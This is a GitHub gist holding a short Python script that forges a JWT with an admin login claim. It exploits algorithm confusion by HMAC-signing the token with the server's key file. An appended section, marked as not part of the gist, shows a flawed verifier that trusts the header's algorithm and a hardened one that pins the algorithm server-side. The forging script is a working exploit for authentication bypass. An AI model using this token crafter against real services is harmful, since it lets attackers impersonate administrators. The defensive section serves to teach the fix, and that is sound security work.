Created August 4, 2021 09:08
A simple token crafter script to use when the server does not verify the JWT algorithm.
import requests
import base64
import hmac
import hashlib
# Controls
keyFilePath = "KEY GOES HERE"
tokenFromApplication = "TOKEN GOES HERE"
# Read the key
key = open(keyFilePath, "rb").read()
header, payload, signature = tokenFromApplication.split(".")
# {STEP1} Create a malicious payload (Ex: {"username": "admin"})
payload = base64.urlsafe_b64encode(b'{"login":"admin"}').decode("utf-8").strip("=")
# {STEP2} Set the header algorithm to HS256
header = base64.urlsafe_b64encode(b'{"typ":"JWT","alg":"HS256"}').decode("utf-8").strip("=")
# {STEP3} Concatenate the header + payload, which makes the DATA portion of the token
data = header + "." + payload
# {STEP4} Sign the DATA against the key using the HMAC algorithm
# HMAC sign solution found from =>; Use the digest() instead of hexdigest() solution from PentesterLabs
new_signature = base64.urlsafe_b64encode(hmac.new(key, bytes(data, encoding='utf8'), hashlib.sha256).digest()).decode("utf-8").strip("=")
print("Crafted Token => ", data + "." + new_signature)
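
The server-side check that defeats the token produced above, as an added example (not part of the original gist): the verifier takes its algorithm from server configuration instead of the token header. The names `verify_trusting_header`, `verify_pinned`, `VERIFIERS` and `PUBLIC_KEY_BYTES` are assumptions made for illustration, the key bytes are a constructed placeholder, and RS256 signature verification itself is out of scope, so an RS256-pinned key fails closed here.

```python
import base64
import hashlib
import hmac
import json

def b64url_decode(part):
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).decode("ascii").rstrip("=")

def hs256_ok(key, signing_input, sig):
    tag = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
    return hmac.compare_digest(b64url_encode(tag).encode(), sig.encode())

def verify_trusting_header(token, key_material):
    """Flawed pattern: the token's own header selects the algorithm."""
    header_b64, payload_b64, sig = token.split(".")
    alg = json.loads(b64url_decode(header_b64)).get("alg")
    if alg == "HS256":  # a public RSA key ends up used as the HMAC secret
        return hs256_ok(key_material, header_b64 + "." + payload_b64, sig)
    return False  # RS256 branch is out of scope for this sketch

# One verification routine per supported algorithm; anything else fails closed.
VERIFIERS = {"HS256": hs256_ok}

def verify_pinned(token, key_material, pinned_alg):
    """Hardened pattern: pinned_alg comes from server config, never the token."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header_b64, payload_b64, sig = parts
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != pinned_alg:
        raise ValueError("token alg does not match the pinned algorithm")
    verifier = VERIFIERS.get(pinned_alg)
    if verifier is None or not verifier(key_material, header_b64 + "." + payload_b64, sig):
        raise ValueError("signature check failed")
    return json.loads(b64url_decode(payload_b64))

def build_hs256_token(key, claims):
    """Builds the constructed sample tokens used below and in the checks."""
    header = b64url_encode(json.dumps({"typ": "JWT", "alg": "HS256"}).encode())
    payload = b64url_encode(json.dumps(claims).encode())
    data = header + "." + payload
    return data + "." + b64url_encode(hmac.new(key, data.encode("ascii"), hashlib.sha256).digest())

# Constructed sample input: placeholder bytes standing in for a published public key.
PUBLIC_KEY_BYTES = b"-----BEGIN PUBLIC KEY-----\nconstructed-sample\n-----END PUBLIC KEY-----\n"
CONFUSED_TOKEN = build_hs256_token(PUBLIC_KEY_BYTES, {"login": "admin"})
```

With the key pinned to RS256, `verify_pinned` rejects `CONFUSED_TOKEN` at the header comparison, before any HMAC is computed over the public key.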